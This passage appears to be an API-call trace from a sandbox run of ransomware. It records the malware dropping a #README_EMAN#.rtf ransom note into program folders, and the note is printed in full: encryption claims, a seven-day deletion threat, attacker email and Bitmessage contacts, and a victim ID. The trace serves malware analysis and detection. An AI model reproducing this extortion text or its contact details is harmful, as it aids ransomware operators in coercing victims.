\\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef6f08, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06", lpUsedDefaultChar=0x0) returned 8717 [0215.181] WriteFile (in: hFile=0x2f0, lpBuffer=0x1ef6f08*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef6f08*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0215.190] CloseHandle (hObject=0x2f0) returned 1 [0215.192] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\bin\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\#readme_eman#.rtf")) returned 0x20 [0215.192] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\#readme_eman#.rtf")) returned 0x20 [0215.192] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\images\\cursors\\#readme_eman#.rtf")) returned 0x20 [0215.192] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\#readme_eman#.rtf")) returned 0x20 [0215.192] Sleep (dwMilliseconds=0x3e8) [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount2=35) returned 1 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount2=56) returned 3 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount2=56) returned 1 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount2=46) returned 1 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount2=46) returned 1 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount2=46) returned 1 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount2=78) returned 3 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount2=78) returned 1 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount2=78) returned 3 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount2=78) returned 3 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount2=78) returned 1 [0216.551] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount2=78) returned 2 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 3 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 3 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\", cchCount2=76) returned 3 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount2=46) returned 1 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\", cchCount1=35, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount2=46) returned 1 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount2=46) returned 1 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount1=46, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\", cchCount2=46) returned 2 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0216.552] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0216.552] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\#readme_eman#.rtf")) returned 0x20 [0216.552] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\#readme_eman#.rtf")) returned 0x20 [0216.552] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\#readme_eman#.rtf")) returned 0xffffffff [0216.552] GetLastError () returned 0x2 [0216.552] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\visualelements\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0218.017] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. 